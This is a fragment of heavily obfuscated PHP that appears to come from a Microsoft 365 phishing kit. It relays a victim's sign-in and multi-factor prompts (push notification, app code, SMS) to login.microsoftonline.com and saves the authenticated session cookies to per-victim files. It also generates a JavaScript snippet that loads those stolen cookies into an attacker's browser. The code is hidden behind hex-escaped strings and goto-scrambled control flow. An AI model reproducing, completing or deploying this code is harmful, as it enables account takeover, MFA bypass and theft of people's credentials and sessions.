                        "\x4d\x6f\x7a\x69\x6c\154\141\x2f\65\x2e\x30\40\50\115\x61\143\151\156\164\x6f\163\x68\73\40\111\156\164\x65\154\x20\115\141\143\x20\x4f\x53\x20\x58\x20\x31\60\x2e\61\x35\x3b\40\x72\166\72\61\60\x39\x2e\x30\51\x20\107\x65\x63\153\x6f\x2f\x32\x30\61\x30\60\x31\60\61\x20\106\x69\162\145\x66\x6f\170\x2f\x31\61\65\56\60",
                    "\x41\x63\x63\145\160\164" =>
                        "\164\x65\x78\x74\57\150\164\x6d\x6c\x2c\141\160\x70\x6c\151\x63\x61\164\151\157\x6e\x2f\170\150\164\x6d\154\53\170\155\154\54\141\160\x70\x6c\x69\x63\141\x74\151\157\156\x2f\170\x6d\x6c\73\x71\75\60\56\x39\x2c\151\x6d\x61\147\x65\57\141\x76\151\x66\x2c\x69\155\x61\x67\x65\57\x77\x65\142\160\x2c\52\x2f\x2a\73\x71\x3d\x30\x2e\70",
                    "\101\143\x63\145\160\164\55\114\141\156\x67\x75\x61\147\145" =>
                        "\x65\156\x2d\x55\x53\x2c\x65\156\x3b\161\75\60\x2e\x35",
                    "\101\x63\143\x65\160\164\x2d\x45\156\x63\157\x64\x69\156\147" =>
                        "\x67\x7a\151\x70\54\40\144\x65\x66\x6c\x61\164\x65\54\x20\142\x72",
                    "\x52\145\x66\145\162\145\x72" =>
                        "\150\x74\x74\160\x73\72\x2f\x2f\x6c\x6f\x67\151\x6e\56\x6d\151\x63\162\157\163\x6f\146\x74\x6f\x6e\x6c\151\x6e\x65\x2e\x63\x6f\x6d\x2f\x63\x6f\x6d\155\x6f\156\x2f\x6c\x6f\x67\x69\x6e",
                    "\103\157\156\164\145\x6e\164\x2d\x54\x79\160\145" =>
                        "\141\x70\160\x6c\x69\143\x61\164\x69\157\156\x2f\x78\55\167\167\x77\55\146\x6f\x72\155\55\165\162\x6c\145\x6e\143\157\x64\145\144",
                    "\x4f\162\x69\147\x69\156" =>
                        "\150\x74\164\160\x73\x3a\57\x2f\154\157\147\151\156\x2e\x6d\x69\x63\x72\157\x73\x6f\146\164\157\156\x6c\151\x6e\145\56\143\157\x6d",
                    "\103\x6f\156\x6e\145\x63\164\x69\157\x6e" =>
                        "\153\145\x65\160\55\141\x6c\x69\166\145",
                    "\x43\157\x6f\153\151\x65" => $this->gencook(
                        $this->A20d7 .
                            "\x2f\143\157\157\x6b\151\145\137" .
                            $this->Fa736 .
                            "\x2e\x74\x78\x74"
                    ),
                    "\x55\x70\147\162\x61\144\145\55\x49\156\163\x65\143\165\x72\x65\x2d\x52\145\161\165\145\163\x74\x73" =>
                        "\x31",
                    "\x53\x65\x63\55\x46\x65\164\x63\150\x2d\x44\145\x73\164" =>
                        "\x64\x6f\x63\x75\x6d\145\x6e\x74",
                    "\123\145\x63\x2d\x46\x65\x74\143\150\55\x4d\x6f\x64\x65" =>
                        "\156\x61\x76\151\147\x61\x74\145",
                    "\123\145\x63\x2d\x46\145\x74\143\150\x2d\123\151\164\145" =>
                        "\163\141\155\x65\55\x6f\x72\x69\147\x69\x6e",
                ],
                "\x66\x6f\x72\155\137\x70\x61\x72\141\155\163" => [
                    "\164\x79\160\x65" => "\62\62",
                    "\162\145\x71\x75\145\x73\164" => $this->cc473,
                    "\x6d\x66\141\114\x61\163\164\120\157\x6c\154\123\164\141\x72\x74" =>
                        "\x31\66\70\x39\x38\x34\60\x31\x34\62\64\x38\61",
                    "\155\x66\141\x4c\141\x73\x74\120\x6f\x6c\x6c\x45\156\144" =>
                        "\x31\66\70\71\70\x34\x30\x31\64\63\66\60\x32",
                    "\x6d\x66\x61\x41\165\164\150\115\145\x74\150\x6f\144" =>
                        "\120\x68\x6f\156\145\x41\x70\x70\116\x6f\164\151\146\151\143\141\x74\x69\x6f\156",
                    "\154\157\x67\151\156" => $this->Fa736,
                    "\x66\x6c\157\167\x54\157\153\145\156" => $this->fac50,
                    "\x68\160\x67\x72\x65\161\165\145\163\x74\x69\x64" =>
                        $this->E423c,
                    "\163\141\x63\x78\164" => "",
                    "\x68\x69\x64\145\x53\155\x73\111\x6e\115\x66\141\x50\x72\x6f\157\146\x73" =>
                        "\146\141\154\x73\145",
                    "\x63\141\156\141\x72\171" => $this->B5b07,
                    "\x69\61\x39" => "\x32\x38\x31\x33\62",
                ],
            ]
        );
        goto F147a;
        f88f4:
        preg_match(
            "\x2f\x28\77\x3c\75\x22\163\106\124\42\72\42\x29\x5b\136\42\x5d\52\57",
            $A75e0,
            $ea051
        );
        goto Dafda;
        B71cb:
        preg_match(
            "\57\x28\77\74\x3d\42\x63\141\x6e\141\162\x79\x22\x3a\x22\51\x5b\136\x22\x5d\52\57",
            $A75e0,
            $ef175
        );
        goto B63eb;
        dae7d:
        $this->B5b07 = $ef175;
        goto E72da;
        Cfcff:
        $this->fac50 = $ea051;
        goto dae7d;
        Dafda:
        $ea051 = $ea051[0];
        goto F68fd;
        Fdd58:
        $E2cb4 = $E2cb4[0];
        goto Ab49c;
        D08b0:
        $this->fac50 = $ea051;
        goto B71cb;
        b375a:
        $this->cc473 = $Bc3b4;
        goto a1ce9;
        f6157:
        preg_match(
            "\x2f\x28\77\74\75\x22\x73\145\x73\x73\151\x6f\x6e\111\144\x22\72\x22\x29\133\136\42\x5d\x2a\x2f",
            $A75e0,
            $E2cb4
        );
        goto D5ed7;
        dacf7:
        preg_match(
            "\x2f\x28\77\x3c\75\x22\163\103\164\x78\42\x3a\x22\x29\x5b\136\x22\x5d\x2a\x2f",
            $A75e0,
            $Bc3b4
        );
        goto Ff28b;
        a63f7:
        $this->B5b07 = $ef175;
        goto Cf994;
        f120e:
        $D5295 = file_get_contents(
            $this->A20d7 .
                "\57\x63\x6f\x6f\x6b\151\x65\x5f" .
                $this->Fa736 .
                "\x2e\x74\170\164"
        );
        goto B61e7;
        aa521:
        $A75e0 = $Accd6->getBody()->getContents();
        goto C7265;
        F90c2:
        $ef175 = $ef175[0];
        goto a63f7;
        B63eb:
        $ef175 = $ef175[0];
        goto Afa3a;
        a52b4:
        $Accd6 = $Bcc9d->request(
            "\x50\x4f\x53\124",
            "\150\164\164\x70\x73\72\57\57\x6c\157\147\151\156\x2e\x6d\151\x63\162\x6f\163\x6f\146\x74\157\156\x6c\x69\x6e\x65\56\143\157\155\x2f\x6b\155\x73\151",
            [
                "\x68\x65\141\x64\x65\x72\163" => [
                    "\x41\143\x63\145\x70\x74" =>
                        "\x74\x65\x78\164\x2f\x68\164\155\154\x2c\141\x70\x70\154\151\x63\x61\164\x69\157\156\57\x78\x68\x74\x6d\154\53\170\155\154\54\x61\160\x70\x6c\151\143\141\x74\x69\157\x6e\x2f\x78\155\154\73\x71\x3d\x30\56\71\54\151\155\x61\147\x65\x2f\141\x76\151\146\54\x69\155\141\x67\145\x2f\x77\145\142\160\54\151\155\x61\147\x65\x2f\x61\160\156\x67\x2c\52\57\52\x3b\161\75\x30\x2e\70\54\x61\x70\x70\154\151\x63\141\x74\151\x6f\156\x2f\x73\x69\147\x6e\145\144\55\145\170\143\150\x61\x6e\147\x65\x3b\166\x3d\x62\x33\x3b\161\x3d\x30\x2e\67",
                    "\101\143\143\x65\160\164\x2d\114\141\x6e\x67\x75\141\147\x65" =>
                        "\145\156\55\125\123\x2c\x65\x6e\73\x71\75\x30\x2e\71",
                    "\x43\x61\x63\150\145\55\x43\157\156\x74\162\x6f\x6c" =>
                        "\x6d\x61\170\x2d\x61\x67\x65\75\60",
                    "\x43\x6f\x6e\164\x65\x6e\164\x2d\x54\171\x70\x65" =>
                        "\x61\160\x70\154\151\x63\x61\x74\x69\x6f\156\57\x78\55\167\x77\x77\x2d\146\x6f\x72\x6d\55\x75\162\154\x65\156\x63\x6f\144\145\x64",
                    "\103\157\x6f\153\151\145" => $this->gencook(
                        $this->A20d7 .
                            "\57\143\157\x6f\153\x69\145\x5f" .
                            $this->Fa736 .
                            "\56\x74\x78\164"
                    ),
                    "\117\162\151\x67\151\x6e" =>
                        "\150\164\164\x70\163\x3a\57\57\154\157\147\151\156\56\155\151\x63\x72\x6f\163\x6f\x66\x74\x6f\156\154\x69\x6e\145\56\x63\x6f\155",
                    "\x52\x65\x66\145\162\x65\x72" =>
                        "\150\164\x74\x70\163\x3a\57\x2f\154\x6f\x67\x69\x6e\56\x6d\x69\x63\x72\157\x73\157\146\164\157\x6e\x6c\x69\156\x65\x2e\x63\x6f\x6d\57\143\157\155\x6d\x6f\156\57\154\157\x67\151\x6e",
                    "\x53\x65\143\x2d\103\110\55\x55\101" =>
                        "\x22\115\151\x63\162\x6f\x73\x6f\146\164\40\x45\x64\x67\x65\42\73\166\x3d\x22\x31\62\71\x22\x2c\40\42\x4e\x6f\164\75\x41\x3f\x42\x72\141\x6e\144\x22\x3b\x76\75\x22\x38\x22\54\x20\42\103\150\162\x6f\x6d\x69\x75\155\42\x3b\166\x3d\42\61\62\x39\42",
                    "\x53\145\143\55\x43\x48\55\125\101\x2d\115\157\x62\151\x6c\145" =>
                        "\77\60",
                    "\x53\x65\x63\55\x43\x48\55\125\x41\x2d\120\x6c\141\164\x66\x6f\x72\x6d" =>
                        "\x22\x57\151\x6e\x64\x6f\x77\x73\42",
                    "\123\x65\x63\55\106\x65\x74\x63\150\x2d\104\x65\x73\x74" =>
                        "\144\157\x63\165\x6d\x65\x6e\x74",
                    "\123\145\143\55\x46\x65\x74\143\x68\x2d\115\x6f\x64\x65" =>
                        "\x6e\141\166\x69\x67\x61\x74\145",
                    "\x53\x65\x63\55\x46\145\164\143\150\55\123\151\x74\x65" =>
                        "\x73\141\155\145\x2d\x6f\x72\151\147\151\156",
                    "\x53\145\x63\55\106\145\164\143\x68\x2d\125\x73\x65\162" =>
                        "\x3f\61",
                    "\x55\x70\x67\x72\x61\x64\145\55\x49\156\x73\145\x63\165\162\145\x2d\x52\x65\x71\165\145\x73\x74\x73" =>
                        "\x31",
                    "\x55\x73\145\x72\x2d\101\147\145\156\164" =>
                        "\x4d\x6f\172\x69\154\154\x61\57\x35\x2e\x30\40\50\x57\151\156\x64\x6f\167\163\40\x4e\124\40\61\x30\x2e\x30\73\40\x57\151\156\x36\x34\73\x20\x78\x36\64\51\40\101\160\x70\154\145\x57\x65\x62\x4b\x69\164\57\65\63\x37\x2e\63\66\x20\50\113\110\124\115\114\54\x20\x6c\x69\153\x65\x20\x47\x65\143\x6b\157\x29\x20\x43\150\162\157\x6d\145\x2f\x31\62\x39\56\x30\x2e\60\x2e\60\40\x53\x61\x66\x61\162\x69\57\x35\x33\x37\x2e\63\x36\40\105\x64\147\x2f\x31\62\71\56\x30\x2e\60\56\60",
                ],
                "\146\157\162\x6d\x5f\x70\141\x72\x61\x6d\x73" => [
                    "\x4c\x6f\x67\151\x6e\117\x70\x74\151\x6f\156\163" =>
                        "\x31",
                    "\x74\x79\160\145" => "\x32\70",
                    "\x63\164\x78" => $this->cc473,
                    "\150\x70\x67\x72\x65\x71\165\145\x73\x74\151\144" =>
                        $this->ad1e3,
                    "\146\x6c\x6f\x77\x54\x6f\153\x65\x6e" => $this->fac50,
                    "\104\x6f\156\164\123\x68\157\x77\x41\147\x61\151\x6e" =>
                        "\x74\162\x75\x65",
                    "\143\141\156\x61\162\171" => $this->B5b07,
                    "\151\61\71" => "\61\64\61\x30\70",
                ],
            ]
        );
        goto d3d63;
        F68fd:
        preg_match(
            "\57\x28\x3f\74\75\42\163\120\x72\x6f\x6f\x66\125\160\x41\x75\x74\x68\123\164\141\x74\x65\x22\72\42\51\133\136\x22\x5d\52\x2f",
            $A75e0,
            $e6a8e
        );
        goto c2c61;
        Eb5e3:
        $F16be->save(
            $this->A20d7 .
                "\57\143\157\157\153\x69\x65\x5f" .
                $this->Fa736 .
                "\x2e\164\170\164"
        );
        goto cdd97;
        Afa3a:
        $this->B5b07 = $ef175;
        goto b546a;
        Cf858:
        $ef175 = $ef175[0];
        goto Cfcff;
        C7265:
        if (
            strpos(
                $A75e0,
                "\x43\x6f\156\x76\x65\x72\147\x65\x64\120\x72\x6f\157\x66\x55\160\x52\145\144\151\162\x65\x63\164"
            ) !== false
        ) {
            goto Ad0e2;
        }
        goto A52ec;
        C292c:
        $ea051 = $ea051[0];
        goto b61c4;
        Cf994:
        e18be:
        goto a52b4;
        A26b2:
        preg_match(
            "\57\50\77\74\x3d\x22\x73\106\124\42\72\x22\51\133\x5e\42\135\52\57",
            $A75e0,
            $ea051
        );
        goto C292c;
        B575d:
        $Bcc9d = new Client(["\x63\157\157\153\x69\145\x73" => $F16be]);
        goto E1701;
        A52ec:
        preg_match(
            "\57\x28\x3f\x3c\75\x22\x73\x43\x74\170\x22\x3a\42\x29\x5b\136\42\135\52\x2f",
            $A75e0,
            $Bc3b4
        );
        goto A240d;
        ce2b9:
        preg_match(
            "\x2f\x28\x3f\x3c\75\x22\x63\141\x6e\141\162\171\42\x3a\x22\x29\133\136\42\x5d\x2a\x2f",
            $A75e0,
            $ef175
        );
        goto Cf858;
        d3d63:
        $F16be->save(
            $this->A20d7 .
                "\57\x63\x6f\157\153\151\x65\137" .
                $this->Fa736 .
                "\x2e\164\x78\x74"
        );
        goto d1529;
        caaf7:
        preg_match(
            "\x2f\x28\x3f\x3c\75\x22\x63\x61\156\141\162\x79\42\x3a\42\x29\x5b\136\42\135\x2a\57",
            $A75e0,
            $ef175
        );
        goto F90c2;
        c2c61:
        $e6a8e = $e6a8e[0];
        goto ce2b9;
        a1ce9:
        preg_match(
            "\x2f\x28\x3f\74\x3d\x22\x73\x65\163\163\151\157\x6e\x49\144\42\72\x22\x29\x5b\136\x22\135\52\57",
            $A75e0,
            $E2cb4
        );
        goto Fdd58;
        d4857:
        $F16be = new FileCookieJar(
            $this->A20d7 .
                "\57\143\x6f\x6f\153\151\145\x5f" .
                $this->Fa736 .
                "\56\x74\170\x74",
            true
        );
        goto A14bc;
        fb6a5:
        preg_match(
            "\x2f\x28\77\x3c\x3d\42\x73\106\124\x22\72\x22\x29\x5b\136\42\135\x2a\x2f",
            $A75e0,
            $ea051
        );
        goto c0271;
        d2e5d:
        $this->E423c = $E2cb4;
        goto fb6a5;
        A14bc:
        $Bcc9d = new Client(["\x63\x6f\x6f\x6b\151\145\163" => $F16be]);
        goto B9926;
        A240d:
        $Bc3b4 = $Bc3b4[0];
        goto be831;
        b61c4:
        $this->fac50 = $ea051;
        goto caaf7;
        F147a:
        $F16be->save(
            $this->A20d7 .
                "\x2f\143\x6f\x6f\153\x69\145\137" .
                $this->Fa736 .
                "\56\164\170\164"
        );
        goto aa521;
        B61e7:
        $E3848 =
            "\x28\x66\x75\x6e\x63\x74\x69\157\156\50\51\40\173\15\12\x9\11\11\11\11\x6c\145\164\x20\x63\x6f\x6f\153\151\145\x73\40\x3d\40\112\x53\x4f\116\x2e\160\x61\x72\163\145\x28\140" .
            $D5295 .
            "\140\51\73\xd\xa\11\x9\x9\x9\xd\12\11\11\11\x9\x9\x66\x75\x6e\143\x74\x69\x6f\x6e\40\160\165\x74\103\x6f\157\153\x69\x65\x28\153\x65\171\54\40\x76\141\154\165\145\x2c\40\144\x6f\155\141\151\156\54\x20\160\x61\164\x68\x2c\40\151\x73\123\145\x63\165\162\145\x29\x20\x7b\15\xa\11\x9\11\x9\x9\x9\143\x6f\x6e\x73\164\40\x63\x6f\x6f\x6b\151\145\x4d\x61\x78\101\x67\x65\40\75\40\42\x4d\141\170\x2d\101\x67\145\x3d\63\x31\x35\63\66\60\x30\x30\42\73\15\xa\11\11\x9\11\x9\x9\151\x66\40\50\x6b\x65\171\x2e\163\x74\x61\x72\164\x73\127\x69\164\150\50\42\x5f\137\x48\157\163\164\x22\x29\x29\x20\x7b\xd\xa\11\x9\11\x9\11\11\11\143\x6f\156\163\157\154\x65\56\x6c\x6f\x67\50\x22\75\75\75\75\40\x4b\162\x61\x74\x6f\x73\40\x3d\x3d\x3d\x3d\76\42\x2c\40\x6b\145\171\54\x20\x76\x61\x6c\x75\145\x29\x3b\15\12\11\x9\x9\11\x9\x9\x9\144\x6f\143\x75\x6d\x65\156\x74\x2e\x63\157\157\153\x69\x65\40\x3d\40\140\44\x7b\x6b\x65\171\x7d\75\44\x7b\166\141\x6c\165\145\x7d\x3b\x24\173\x63\157\x6f\153\151\145\x4d\x61\x78\101\x67\x65\175\73\160\x61\164\x68\75\x2f\x3b\123\x65\143\165\x72\x65\x3b\x53\x61\x6d\145\123\151\x74\145\x3d\x4e\157\156\x65\140\73\xd\12\x9\11\x9\x9\11\x9\x7d\x20\x65\x6c\163\x65\40\151\x66\x20\x28\153\x65\x79\56\x73\164\x61\x72\x74\x73\127\x69\164\x68\x28\x22\137\x5f\x53\x65\143\x75\162\x65\x22\51\x29\40\x7b\15\xa\x9\x9\x9\x9\11\11\x9\143\x6f\156\163\x6f\x6c\145\56\x6c\157\147\x28\x22\x3d\75\x3d\x3d\x20\x4b\162\141\164\x6f\163\x20\75\75\x3d\75\76\x22\x2c\40\x6b\x65\x79\x2c\x20\166\141\154\165\x65\51\73\15\xa\x9\x9\x9\11\11\11\11\x64\x6f\x63\165\x6d\145\156\x74\56\143\157\x6f\x6b\151\x65\x20\x3d\x20\x60\x24\173\x6b\145\171\175\75\44\x7b\x76\141\154\165\145\175\73\x24\173\x63\x6f\x6f\153\151\145\115\141\170\x41\147\x65\x7d\x3b\x64\157\x6d\141\x69\x6e\75\44\x7b\144\x6f\x6d\x61\151\x6e\x7d\73\160\x61\x74\x68\x3d\x24\x7b\160\x61\164\150\x7d\73\x53\x65\143\165\x72\145\73\123\141\155\145\123\x69\x74\145\75\x4e\157\x6e\x65\x60\x3b\xd\xa\11\11\x9\x9\11\11\175\x20\x65\154\x73\145\40\x7b\xd\12\11\x9\x9\x9\11\11\x9\151\x66\40\50\x69\163\123\145\143\165\x72\x65\51\40\173\15\12\x9\x9\x9\x9\x9\x9\x9\11\x63\x6f\156\x73\157\154\145\56\154\157\147\50\42\x3d\x3d\x3d\x3d\x20\x4b\162\x61\x74\x6f\163\x20\75\75\x3d\75\76\42\54\x20\x6b\x65\171\x2c\40\x76\141\x6c\x75\x65\51\x3b\xd\12\11\x9\11\11\11\11\11\x9\151\146\40\50\x77\151\x6e\x64\x6f\167\x2e\x6c\x6f\x63\141\164\x69\157\156\56\x68\157\x73\x74\x6e\141\155\x65\40\x3d\x3d\40\144\x6f\155\x61\151\156\51\x20\x7b\xd\12\11\11\11\x9\x9\x9\x9\11\11\x64\x6f\143\165\155\x65\156\164\x2e\x63\157\157\x6b\151\x65\x20\x3d\x20\x60\x24\x7b\x6b\145\171\x7d\75\44\x7b\x76\x61\x6c\165\145\175\73\x24\173\143\x6f\157\153\x69\x65\x4d\x61\x78\101\147\x65\175\73\40\x70\x61\164\150\x3d\x24\173\x70\141\164\x68\175\73\40\x53\145\143\165\162\145\x3b\x20\123\141\x6d\x65\123\151\164\x65\x3d\116\x6f\156\145\x60\73\xd\12\x9\x9\11\x9\11\11\11\x9\175\x20\x65\x6c\163\x65\40\173\15\12\x9\11\x9\x9\x9\x9\x9\x9\11\x64\157\x63\165\x6d\145\x6e\x74\56\143\157\x6f\153\151\145\x20\75\x20\x60\44\173\x6b\x65\x79\x7d\x3d\44\x7b\x76\x61\x6c\x75\145\x7d\x3b\44\173\x63\x6f\x6f\153\151\x65\115\x61\170\x41\147\145\175\73\x64\157\x6d\141\x69\156\x3d\x24\x7b\x64\x6f\155\141\151\156\x7d\73\160\x61\164\x68\75\44\x7b\160\141\164\x68\175\73\123\145\143\x75\162\145\x3b\123\x61\155\x65\x53\151\x74\145\x3d\116\157\156\x65\x60\x3b\15\xa\11\11\11\11\x9\11\11\11\175\15\xa\x9\11\11\x9\11\x9\x9\x7d\40\x65\x6c\x73\145\x20\173\xd\xa\x9\x9\x9\x9\11\x9\x9\11\143\157\156\x73\x6f\154\145\56\x6c\157\x67\x28\x22\x3d\x3d\x3d\x3d\x20\x4b\162\x61\x74\157\x73\40\75\x3d\75\x3d\x3e\x22\x2c\x20\x6b\x65\171\54\x20\x76\141\x6c\165\145\x29\x3b\xd\xa\11\x9\x9\x9\x9\11\11\11\x69\146\x20\x28\x77\x69\156\144\157\167\x2e\x6c\157\x63\141\164\x69\x6f\x6e\x2e\150\x6f\x73\164\x6e\x61\x6d\145\40\x3d\75\40\x64\157\155\x61\x69\x6e\51\x20\173\xd\xa\11\11\x9\x9\x9\x9\x9\11\11\144\157\x63\165\x6d\x65\x6e\x74\x2e\x63\157\157\x6b\x69\145\x20\x3d\40\x60\44\x7b\x6b\x65\x79\x7d\75\x24\173\x76\x61\x6c\165\145\175\x3b\44\x7b\143\x6f\157\153\151\145\x4d\x61\x78\101\x67\145\175\x3b\x70\x61\164\150\x3d\44\173\x70\141\164\150\175\x3b\x60\x3b\xd\xa\x9\11\x9\x9\11\11\11\x9\175\x20\145\154\163\x65\40\x7b\xd\xa\x9\x9\x9\x9\x9\11\x9\11\x9\144\x6f\x63\165\155\145\x6e\x74\x2e\143\157\x6f\x6b\151\145\40\x3d\x20\140\x24\173\x6b\x65\x79\x7d\x3d\44\173\166\x61\x6c\x75\x65\175\73\x24\173\143\x6f\157\x6b\x69\x65\115\141\x78\101\x67\145\x7d\73\144\x6f\x6d\x61\151\156\x3d\44\173\144\157\x6d\141\151\156\175\73\x70\x61\x74\x68\75\x24\x7b\160\141\x74\150\x7d\73\x60\73\xd\12\11\x9\11\x9\x9\x9\x9\x9\175\xd\xa\11\11\x9\11\11\11\x9\175\xd\12\11\x9\11\x9\11\11\x7d\xd\xa\11\11\x9\x9\x9\x7d\15\12\x9\11\x9\11\11\146\x6f\x72\x20\x28\154\145\164\40\143\157\x6f\x6b\x69\145\x20\x6f\146\40\143\x6f\x6f\x6b\x69\145\x73\x29\40\x7b\15\12\11\11\11\x9\11\x9\160\165\x74\x43\157\x6f\153\x69\x65\x28\143\x6f\157\153\151\145\56\x4e\x61\155\x65\54\x20\x63\157\157\153\x69\x65\56\126\x61\154\165\x65\x2c\x20\x63\x6f\x6f\x6b\151\x65\56\104\x6f\155\x61\151\156\x2c\x20\x63\157\x6f\x6b\151\145\x2e\x50\141\x74\x68\54\x20\x63\157\157\153\x69\145\56\x53\145\143\165\162\x65\51\x3b\xd\12\11\x9\x9\11\x9\175\xd\xa\x9\11\x9\x9\x7d\50\51\51\73";
        goto Dacb6;
        Ff28b:
        $Bc3b4 = $Bc3b4[0];
        goto b375a;
        d1529:
        $A75e0 = $Accd6->getBody()->getContents();
        goto f120e;
        D5ed7:
        $E2cb4 = $E2cb4[0];
        goto d2e5d;
        Dacb6:
        file_put_contents(
            $this->A20d7 .
                "\57\x6a\163\137" .
                $this->Fa736 .
                "\x2e\x74\170\x74",
            $E3848
        );
        goto e7078;
        cdd97:
        $A75e0 = $Accd6->getBody()->getContents();
        goto dacf7;
        E1701:
        $Accd6 = $Bcc9d->post(
            "\150\164\x74\160\x73\x3a\x2f\57\x6c\x6f\147\x69\x6e\56\x6d\x69\x63\162\x6f\163\157\x66\x74\x6f\x6e\x6c\x69\156\145\56\x63\x6f\x6d\57\143\157\x6d\155\157\156\x2f\x72\145\x73\165\x6d\145",
            [
                "\161\165\x65\162\x79" => [
                    "\163\153\151\x70\155\x66\141\162\x65\x67\151\x73\x74\x72\141\164\151\157\156" =>
                        "\x31",
                ],
                "\150\x65\141\x64\145\162\163" => [
                    "\125\163\145\x72\x2d\x41\147\x65\156\164" =>
                        "\115\157\x7a\x69\154\154\x61\57\x35\56\x30\x20\50\115\x61\143\x69\156\x74\x6f\x73\x68\x3b\40\111\x6e\x74\x65\x6c\x20\115\141\x63\x20\117\123\x20\130\x20\x31\60\x2e\61\x35\73\40\162\x76\x3a\x31\x32\x32\x2e\x30\51\40\x47\x65\x63\x6b\x6f\x2f\62\60\61\60\60\x31\60\61\x20\x46\151\x72\145\146\157\170\57\x31\x32\62\x2e\60",
                    "\101\x63\143\x65\x70\164" =>
                        "\x74\x65\x78\x74\57\x68\164\x6d\x6c\x2c\141\x70\160\x6c\x69\143\141\164\151\x6f\x6e\x2f\x78\150\164\x6d\154\x2b\170\x6d\154\54\x61\x70\x70\154\x69\x63\x61\x74\151\157\x6e\57\x78\155\154\x3b\x71\x3d\x30\56\71\x2c\x69\155\x61\147\x65\57\x61\x76\151\x66\54\151\155\141\147\145\57\167\x65\142\x70\x2c\x2a\x2f\x2a\x3b\161\x3d\x30\x2e\70",
                    "\x41\x63\143\x65\x70\164\x2d\x4c\x61\x6e\x67\x75\x61\x67\145" =>
                        "\x65\x6e\55\125\123\x2c\145\156\73\161\x3d\x30\56\65",
                    "\101\143\x63\x65\160\164\55\x45\156\143\157\x64\x69\156\x67" =>
                        "\x67\x7a\151\x70\54\40\x64\x65\146\154\x61\x74\x65\54\40\x62\162",
                    "\x52\x65\x66\145\162\145\x72" =>
                        "\x68\x74\164\160\163\x3a\57\x2f\x6c\x6f\x67\151\156\56\x6d\151\x63\162\x6f\x73\157\x66\x74\x6f\156\x6c\151\156\145\56\x63\157\x6d\x2f\x63\157\x6d\155\x6f\156\x2f\x53\x41\x53\x2f\120\162\x6f\x63\x65\163\x73\x41\165\164\150",
                    "\x43\x6f\156\164\x65\x6e\x74\x2d\x54\x79\x70\145" =>
                        "\141\160\x70\x6c\151\143\141\x74\x69\157\x6e\x2f\170\55\167\x77\x77\55\x66\x6f\162\x6d\x2d\165\162\154\145\156\x63\157\144\145\x64",
                    "\117\162\x69\147\x69\x6e" =>
                        "\150\164\x74\160\163\x3a\57\x2f\154\157\x67\x69\x6e\56\155\151\x63\x72\x6f\x73\157\146\164\x6f\156\154\x69\156\145\56\143\157\x6d",
                    "\103\x6f\156\156\x65\143\x74\x69\x6f\x6e" =>
                        "\153\x65\x65\160\x2d\x61\154\151\166\x65",
                    "\x43\x6f\x6f\153\151\145" => $this->gencook(
                        $this->A20d7 .
                            "\x2f\143\x6f\x6f\153\x69\145\x5f" .
                            $this->Fa736 .
                            "\56\164\x78\164"
                    ),
                    "\x55\160\147\162\141\144\x65\55\x49\156\x73\x65\x63\x75\162\145\55\x52\x65\161\x75\x65\163\x74\163" =>
                        "\61",
                    "\x53\145\143\x2d\106\x65\x74\143\150\55\104\145\x73\164" =>
                        "\144\157\143\x75\x6d\145\156\x74",
                    "\123\x65\143\55\106\145\x74\x63\x68\55\x4d\x6f\x64\145" =>
                        "\x6e\141\166\151\147\x61\164\145",
                    "\123\145\x63\x2d\x46\145\x74\143\150\x2d\x53\151\164\x65" =>
                        "\x73\x61\x6d\145\x2d\157\162\151\x67\x69\x6e",
                    "\123\x65\x63\55\x46\x65\x74\143\x68\x2d\125\163\x65\162" =>
                        "\x3f\61",
                    "\x54\x45" => "\164\162\141\151\154\145\x72\x73",
                ],
                "\x66\157\162\x6d\137\x70\x61\162\x61\155\x73" => [
                    "\146\x6c\157\x77\x54\x6f\x6b\x65\x6e" => $this->{$ea051},
                    "\143\164\x78" => $e6a8e,
                    "\143\141\156\x61\162\x79" => $this->{$ef175},
                ],
            ]
        );
        goto Eb5e3;
        be831:
        $this->cc473 = $Bc3b4;
        goto f6157;
        c0271:
        $ea051 = $ea051[0];
        goto D08b0;
        E9bb3:
        Ad0e2:
        goto f88f4;
        E72da:
        $F16be = new FileCookieJar(
            $this->A20d7 .
                "\57\143\x6f\157\153\151\x65\x5f" .
                $this->Fa736 .
                "\x2e\164\x78\164",
            true
        );
        goto B575d;
        Ab49c:
        $this->E423c = $E2cb4;
        goto A26b2;
        b546a:
        goto e18be;
        goto E9bb3;
        e7078:
    }
    public function BeginAuth($C19e5)
    {
        goto D6bce;
        Cfdd7:
        D8b9b:
        goto f00ee;
        F3090:
        if (
            strpos(
                $A75e0,
                "\42\x53\165\143\143\145\163\x73\42\72\164\x72\165\145"
            ) !== false
        ) {
            goto D6f37;
        }
        goto b2159;
        bd531:
        $this->redirect();
        goto Bb442;
        E6fbc:
        D6f37:
        goto Ee1e0;
        f00ee:
        $de1ca = "\x50\x68\x6f\x6e\x65\x41\160\x70\117\124\120";
        goto B02a6;
        d4b9c:
        $this->B522d =
            $_SESSION[
                "\x69\156\x66\x6f\x5f\x74\157\x6b\145\156\x5f\62\x66\x61"
            ]["\x61\x70\151\137\x63\x61\156\x61\x72\171"];
        goto ca85e;
        Fc75a:
        fd893:
        goto a3063;
        e9075:
        goto bb415;
        goto Cfdd7;
        e3e0c:
        goto f4f49;
        goto E6fbc;
        B02a6:
        bb415:
        goto d6e87;
        A9fc5:
        goto D57ff;
        goto Ffcd2;
        a3063:
        f4f49:
        goto dcc18;
        D6bce:
        if (
            !(
                $this->Fa736 != $_SESSION["\x65\x6d\x61\x69\x6c"] ||
                !isset($_SESSION["\x73\x74\141\x74\x75\163"]) ||
                !isset(
                    $_SESSION[
                        "\x69\x6e\146\157\137\164\157\x6b\145\x6e\137\62\146\141"
                    ]
                )
            )
        ) {
            goto C37fe;
        }
        goto bd531;
        Bb442:
        C37fe:
        goto ee76d;
        c54fb:
        $this->cc473 =
            $_SESSION[
                "\151\x6e\x66\157\137\x74\157\153\x65\x6e\137\x32\x66\141"
            ]["\163\103\x74\x78"];
        goto d4b9c;
        E72f9:
        $Bcc9d = new Client(["\143\x6f\x6f\x6b\151\145\163" => $F16be]);
        goto B315f;
        Ee1e0:
        $this->status[
            "\62\146\141\x5f\142\145\147\x69\156\141\x75\164\150"
        ] = true;
        goto A6ed6;
        d4e30:
        $de1ca = "\x4f\x6e\145\x57\x61\x79\123\x4d\x53";
        goto f3960;
        a207b:
        $this->A20d7 = getcwd() . "\57\x63\157\162\x65";
        goto Abc1e;
        B315f:
        $Accd6 = $Bcc9d->post(
